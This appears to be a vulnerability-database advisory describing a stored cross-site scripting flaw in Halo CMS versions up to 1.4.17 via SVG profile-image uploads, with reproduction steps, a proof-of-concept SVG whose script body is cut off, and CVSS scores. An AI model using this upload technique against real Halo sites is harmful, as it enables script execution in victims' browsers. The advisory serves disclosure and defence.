We found results for “


Date: January 13, 2022


In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that will trigger arbitrary javascript to run on a victim’s browser.


Halo is a modern open-source blogging and content management system. Affected versions of Halo are vulnerable to stored XSS via profile image upload mechanism that allows the uploading of malicious SVG files.

PoC Details

Login to the application.
Enter the profile section, and press on the profile picture in order to change it. Click on “upload an attachment”. Choose a malicious SVG file with a payload such as the one given below, and upload it.
Click “deposit” in order to save. The malicious SVG will be saved under “/upload/”.
Once opened, it will trigger an alert.

PoC Code

// Malicious SVG file contents:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="500" height="500" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">

Affected Environments

Halo versions v1.0.0 through v1.4.17 (latest)


No fix is provided

Language: Java

Good to know:


Cross-Site Scripting (XSS)


Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: